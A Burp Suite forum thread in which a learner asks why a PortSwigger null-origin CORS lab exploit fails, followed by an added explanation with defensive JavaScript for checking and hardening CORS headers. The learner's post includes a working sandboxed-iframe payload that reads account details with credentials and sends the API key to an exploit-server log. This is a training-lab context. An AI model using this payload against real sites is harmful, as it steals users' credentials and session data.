The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Issue with Exploiting Null Origin CORS Vulnerability Due to X-Frame-Options Restriction

Shivam | Last updated: Aug 12, 2024 05:15PM UTC

Dear PortSwigger Team,

I am currently working on a lab exercise that is vulnerable to a null origin CORS vulnerability. According to the lab instructions, we need to exploit this vulnerability by crafting an iframe and JavaScript code. However, I have encountered an issue. The target site includes the following headers in its response:

    HTTP/2 200 OK
    Access-Control-Allow-Origin: null
    Access-Control-Allow-Credentials: true
    Content-Type: application/json; charset=utf-8
    X-Frame-Options: SAMEORIGIN
    Content-Length: 149

The response contains the X-Frame-Options: SAMEORIGIN header, which restricts the site from being loaded in an external iframe. This restriction prevents us from following the provided solution to use an iframe for the exploit. Given this situation, how should we proceed to exploit the null origin CORS vulnerability? The current solution relies on loading the vulnerable endpoint in an iframe, but the X-Frame-Options header prevents this approach.

LAB LINK: https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack
Community solutions LINK: https://www.youtube.com/watch?v=UVB5SH21Ygk

Fix this issue as soon as possible. Thank you for your assistance.

Michelle, PortSwigger Agent | Last updated: Aug 13, 2024 02:34PM UTC

Hi, thanks for getting in touch. I've just tested this lab and could see the apikey in the exploit server logs. Are you using Burp's embedded browser when trying to solve this lab or an external browser? If you are using Burp's embedded browser, which version of Burp are you using? What do you see when you click on View Exploit or try to deliver the exploit to the victim?

Shivam | Last updated: Aug 14, 2024 10:12AM UTC

Hi Michelle,

I was using Firefox and Burp's embedded browser to solve the lab, but I am still facing the same issue. I've pasted the request and response below for your analysis. Could you please help me identify where the issue might be and how to fix it as soon as possible?

Burp Suite version: 2023.12.1.3

Request:

    GET /accountDetails HTTP/2
    Host: 0a9b0056036a2ac087b4e72300e100d9.web-security-academy.net
    Cookie: session=cccc
    Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Origin: null
    Referer: https://0a9b0056036a2ac087b4e72300e100d9.web-security-academy.net/my-account?id=wiener
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Priority: u=0, i

Response:

    HTTP/2 200 OK
    Access-Control-Allow-Origin: null
    Access-Control-Allow-Credentials: true
    Content-Type: application/json; charset=utf-8
    X-Frame-Options: SAMEORIGIN
    Content-Length: 189

    {
      "username": "wiener",
      "email": "",
      "apikey": "a7m7zPuQFBjjMUqsho66HqSNWD8Y5U9v",
      "sessions": [
        "dUXqIYPLO4kNzMV1sxv7I9rKjQHVRP3x",
        "GEPdHJnPqFg1vY4mfeP2DpfjFKxfXOK2"
      ]
    }

I used the following code to solve the lab:

    <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
      var req = new XMLHttpRequest();
      req.onload = reqListener;
      req.open('get','https://0a9b0056036a2ac087b4e72300e100d9.web-security-academy.net/accountDetails',true);
      req.withCredentials = true;
      req.send();
      function reqListener() {
        location='https://exploit-0a3300af03692aa3872fe6ae01df0075.exploit-server.net/log?key='+this.responseText;
      };
    </script>"></iframe>

When I paste this code into the exploit server and click "View Exploit," the browser doesn't load the lab site. Please let me know how I can resolve this issue.

Thanks for your reply.
Shivam
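
The response pasted above shows the condition that actually matters in this thread: Access-Control-Allow-Origin: null together with Access-Control-Allow-Credentials: true. X-Frame-Options: SAMEORIGIN only restricts framing of the target's own pages; it says nothing about whether a document running in the "null" origin may read the body of a credentialed cross-origin request, which is exactly what those two CORS headers permit. The fix belongs on the server. The JavaScript below is an added example, not the lab's, PortSwigger's or Shivam's code: a weak origin handler of the kind the response indicates, a hardened one, and a small header check that flags the exposed combination in a raw response. The TRUSTED_ORIGINS values, the function names and the sample response are assumptions constructed for the example.

```javascript
// Added example (editor's code, not the lab's or PortSwigger's): server-side
// CORS origin handling, the weak form the thread's response shows beside a
// hardened form, plus a header check that flags the weak form in a raw response.
// Origin values and the raw response below are constructed sample inputs.

// Assumption: the application's own first-party origins.
const TRUSTED_ORIGINS = new Set([
  'https://app.example',
  'https://admin.example',
]);

// Weak handler: reflects whatever Origin arrives, including the literal
// "null" that sandboxed iframes, data: URLs and file:// documents send, and
// pairs it with Allow-Credentials, so the victim's cookies ride along.
function weakCorsHeaders(origin) {
  const headers = {};
  if (origin !== undefined) {
    headers['Access-Control-Allow-Origin'] = origin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  return headers;
}

// Hardened handler: exact match against the allowlist, "null" is never
// trusted, credentials are only granted to a matched origin, and Vary: Origin
// stops a shared cache from replaying one origin's answer to another.
function hardenedCorsHeaders(origin) {
  const headers = { 'Vary': 'Origin' };
  if (origin === undefined || origin === 'null' || !TRUSTED_ORIGINS.has(origin)) {
    return headers; // no ACAO header: the browser withholds the response body
  }
  headers['Access-Control-Allow-Origin'] = origin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Parse the header block of a raw HTTP response (status line, then
// "Name: value" lines up to the first blank line) into a lowercase-keyed map.
function parseResponseHeaders(raw) {
  const headers = {};
  const lines = raw.split(/\r?\n/);
  for (const line of lines.slice(1)) {
    if (line.trim() === '') break;
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return headers;
}

// Flag a response that a null-origin document could read with credentials,
// the condition seen in the thread. X-Frame-Options plays no part in this
// check: it governs framing of the response, not reading it via a
// cross-origin fetch or XMLHttpRequest.
function isNullOriginExposed(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;
  return h['access-control-allow-origin'] === 'null' &&
         h['access-control-allow-credentials'] === 'true';
}

// Constructed sample: the header shape from the thread, with a placeholder body.
const SAMPLE_RESPONSE = [
  'HTTP/2 200 OK',
  'Access-Control-Allow-Origin: null',
  'Access-Control-Allow-Credentials: true',
  'Content-Type: application/json; charset=utf-8',
  'X-Frame-Options: SAMEORIGIN',
  'Content-Length: 2',
  '',
  '{}',
].join('\r\n');

function checkSample() {
  return isNullOriginExposed(parseResponseHeaders(SAMPLE_RESPONSE));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('sample exposed to null origin:', checkSample());
  console.log('hardened handler for "null":', hardenedCorsHeaders('null'));
}
```

Run with `node` to see the sample response flagged and the hardened handler answering an Origin of "null" with nothing but Vary: Origin. The same parse-and-check pair can be pointed at any captured response to confirm whether a CORS misconfiguration, rather than a framing restriction, is what determines exposure.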

Michelle, PortSwigger Agent | Last updated: Aug 14, 2024 03:36PM UTC